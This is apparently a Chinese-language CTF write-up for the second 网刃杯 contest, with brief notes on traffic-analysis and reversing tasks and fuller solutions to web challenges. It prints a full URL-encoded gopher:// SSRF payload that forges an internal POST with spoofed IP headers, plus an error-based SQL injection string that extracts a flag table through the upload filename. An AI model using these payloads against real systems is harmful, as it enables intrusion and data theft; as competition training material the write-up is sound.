第二届网刃杯网络安全大赛

第二届网刃杯网络安全大赛

下面前两个是iec和re的签到题目，写出来了，记录一下，后面的是web题目。

1.easyiec

下载附件，流量分析，tcp流追踪，得到flag！

2.freestyle

看到提示!查看反编译

看一下fun1和fun2，基本算数

最终得到两个key拼接得到md5(3327104)，得到flag{31a364d51abd0c8304106c16779d83b1}

3.signin

File协议读取/etc/hosts得到内网ip

ssrf，先构造payload找文件，?url=file:///proc/net/arp,

这样看不太直观，bp抓包看一下！

172.73.23.100 ，172.73.23.1这两个ip试一下gopher协议

gopher://172.73.23.100:80/_%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%37%33%2e%32%33%2e%31%30%30%25%33%41%38%30%25%30%44%25%30%41%58%2d%46%6f%72%77%61%72%64%65%64%2d%46%6f%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%4f%72%69%67%69%6e%61%74%69%6e%67%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%41%64%64%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%52%65%66%65%72%65%72%25%33%41%25%32%30%62%6f%6c%65%61%6e%2e%63%6c%75%62%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%25%30%44%25%30%41%62%25%33%44%31%25%30%44%25%30%41%25%30%44%25%30%41

post传一下得到flag！

4.upload

上传题的sql注入，随便上传抓包，发现正常图片可以上传，图片🐎也能，但是不能解析，所以没用，这样的话就得换个思路，题目提示是sqlyyds，此时也发现type是可控变量

将type改成ctf，然后测试一下filename有没有注入漏洞

加了个’，出现报错，是报错注入，常规报错注入，没过滤啥，但是限制长度了，需要分段读flag

’ and updatexml(1,concat(0x7e,substr((select flag from flag ),1,30),0x7e),0x7e) and ’

flag{5937a0b90b5966939cccd36921c68aa}

5.ez_js

得！就会这些，我太菜，最后一题不会，睡觉！💤